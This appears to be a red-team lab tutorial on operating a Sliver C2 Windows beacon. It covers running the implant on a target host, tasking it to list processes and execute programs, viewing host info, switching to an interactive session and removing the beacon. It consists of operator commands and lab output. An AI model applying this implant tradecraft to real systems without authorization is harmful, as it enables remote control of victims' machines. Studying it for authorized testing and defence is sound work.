Run a Windows Beacon

Deploy the Windows beacon implant to the target host, and run it:

PS C:\Users\steve\Downloads> .\winbeacon.exe

Once the beacon is running, use the beacons command to see if it has communicated to the Sliver Server. It will not show as "ACTIVE" like the session did, instead using a timer for the next implant communication.

[*] Beacon 8c9bdd93 winbeacon - 192.168.0.117:53837 (WinLaptop) - windows/amd64 - Thu, 03 Oct 2024 14:28:59 EDT

sliver > beacons

 ID         Name        Transport   Hostname    Username   Operating System   Last Check-In   Next Check-In
========== =========== =========== =========== ========== ================== =============== ===============
 8c9bdd93   winbeacon   http(s)     WinLaptop   steve      windows/amd64      31s             53s

sliver >

Next, run the use <ID> command to start interacting with the target host.

sliver > use 8c9bdd93

[*] Active beacon winbeacon (8c9bdd93-88dc-4509-a1f5-a4fadf37f2c1)

sliver (winbeacon) >

As we did before, run the ps command. Notice that there is no immediate output from the command, instead it is setup as a task for the next communication cycle. Using the tasks command will show it as pending.

sliver (winbeacon) > ps

[*] Tasked beacon winbeacon (ddccdb5e)

sliver (winbeacon) > tasks

 ID         State     Message Type        Created                         Sent   Completed
========== ========= =================== =============================== ====== ===========
 ddccdb5e   pending   CurrentTokenOwner   Thu, 03 Oct 2024 14:32:47 EDT


[+] winbeacon completed task ddccdb5e

Running the tasks fetch command you can select the command to view the output.

sliver (winbeacon) > tasks fetch

+------------------------------------------------------+
| Beacon Task   | 5dcdab50-6b6a-4c2e-8990-303b5722bbbf |
+---------------+--------------------------------------+
| State         | ✅ Completed                         |
| Description   | PsReq                                |
| Created       | Sat, 05 Oct 2024 15:49:43 EDT        |
| Sent          | Sat, 05 Oct 2024 15:50:29 EDT        |
| Completed     | Sat, 05 Oct 2024 15:50:30 EDT        |
| Request Size  | 15 B                                 |
| Response Size | 33.3 KiB                             |
+------------------------------------------------------+

 Pid     Ppid    Owner             Arch     Executable                                                                                                               
======= ======= ================= ======== ====================
 0       0                                  [System Process]
 4       0                                  System
 108     4                                  Secure System
 144     4                                  Registry 
 644     4                                  smss.exe                                                          

In this example, we will launch Notepad.exe on the target host:

sliver (winbeacon) > execute notepad

[*] Tasked beacon winbeacon (f17e50cf)

sliver (winbeacon) > tasks

 ID         State       Message Type        Created                         Sent                            Completed
========== =========== =================== =============================== =============================== ===============================
 f17e50cf   pending     Execute             Thu, 03 Oct 2024 14:36:58 EDT
 ddccdb5e   completed   CurrentTokenOwner   Thu, 03 Oct 2024 14:32:47 EDT   Thu, 03 Oct 2024 14:32:58 EDT   Thu, 03 Oct 2024 14:32:58 EDT

Once the task has run, view the response as we did before.

sliver (winbeacon) > tasks fetch

? Select a beacon task:  [Use arrows to move, type to filter]
> ddccdb5e  CurrentTokenOwnerReq  completed
  f17e50cf  ExecuteReq            completed

Select the "Execute" task and press enter:

+------------------------------------------------------+
| Beacon Task   | f17e50cf-7d8e-44fb-82d3-2ffea03e6b46 |
+---------------+--------------------------------------+
| State         | ✅ Completed                         |
| Description   | ExecuteReq                           |
| Created       | Thu, 03 Oct 2024 14:36:58 EDT        |
| Sent          | Thu, 03 Oct 2024 14:37:54 EDT        |
| Completed     | Thu, 03 Oct 2024 14:37:54 EDT        |
| Request Size  | 24 B                                 |
| Response Size | 4 B                                  |
+------------------------------------------------------+

[*] Output:

Of course, there is no output but if you look at the target host you will see that Notepad.exe has been opened.

Additionally, you can get the information of the current implant by simply running the info command:

sliver (winbeacon) > info

         Beacon ID: 8c9bdd93-88dc-4509-a1f5-a4fadf37f2c1
              Name: winbeacon
          Hostname: WinLaptop
              UUID: 4c4c4544-004b-4310-805a-b2c04f4e5333
          Username: WinLaptop\steve
               UID: S-1-5-21-192289400-3165233833-1525390679-1001
               GID: S-1-5-21-192289400-3165233833-1525390679-513
               PID: 9344
                OS: windows
           Version: 10 build 22631 x86_64
            Locale: en-US
              Arch: amd64
         Active C2: https://192.168.0.120
    Remote Address: 192.168.0.117:53837
         Proxy URL:
          Interval: 1m0s
            Jitter: 30s
     First Contact: Thu Oct  3 14:28:59 EDT 2024 (14m11s ago)
      Last Checkin: Thu Oct  3 14:42:24 EDT 2024 (46s ago)
      Next Checkin: Thu Oct  3 14:43:35 EDT 2024 (in 25s)

If you have a beacon running on the target host, you can switch the beacon to a session, by executing the interactive command. However, you cannot switch a session to a beacon.

Take a look at the current environment, and then switch to session mode:

sliver (winbeacon) > beacons

 ID         Name        Transport   Hostname    Username   Operating System   Last Check-In   Next Check-In
========== =========== =========== =========== ========== ================== =============== ===============
 8c9bdd93   winbeacon   http(s)     WinLaptop   steve      windows/amd64      13s             52s

sliver (winbeacon) > sessions

[*] No sessions 🙁

Keep in mind that the command is run in beacon mode, so it will be tasked until the next scheduled communication. Once it finishes, you will see that a new session has started.

[*] Session 2fb27427 winbeacon - 192.168.0.117:53891 (WinLaptop) - windows/amd64 - Thu, 03 Oct 2024 14:49:41 EDT

sliver (winbeacon) > sessions

 ID         Transport   Remote Address        Hostname    Username   Operating System   Health
========== =========== ===================== =========== ========== ================== =========
 2fb27427   http(s)     192.168.0.117:53891   WinLaptop   steve      windows/amd64      [ALIVE]

sliver (winbeacon) > use 2fb27427

[*] Active session winbeacon (2fb27427-6583-4b33-9548-fccbcebdd154)

sliver (winbeacon) > whoami

Logon ID: WinLaptop\steve
[*] Current Token ID: WinLaptop\steve

To close an interactive session without killing the remote process, run the close command.

sliver (winbeacon) > close

[!] Lost session 2fb27427 winbeacon - 192.168.0.117:53891 (WinLaptop) - windows/amd64 - Thu, 03 Oct 2024 15:14:46 EDT

Once your use of the implant is finished, you can kill the process on the target host, or you can just kill the beacon in Sliver. Keep in mind that the executable will still be on the target host. Since the beacon is not in use, we can just remove it.

sliver > beacons rm

? Select a beacon: 8c9bdd93-88dc-4509-a1f5-a4fadf37f2c1  winbeacon  192.168.0.117:53837  WinLaptop  WinLaptop\steve  windows/amd64
[*] Beacon removed (8c9bdd93-88dc-4509-a1f5-a4fadf37f2c1)

Kill the beacon off, and ensure that no sessions or beacons are running on the target host.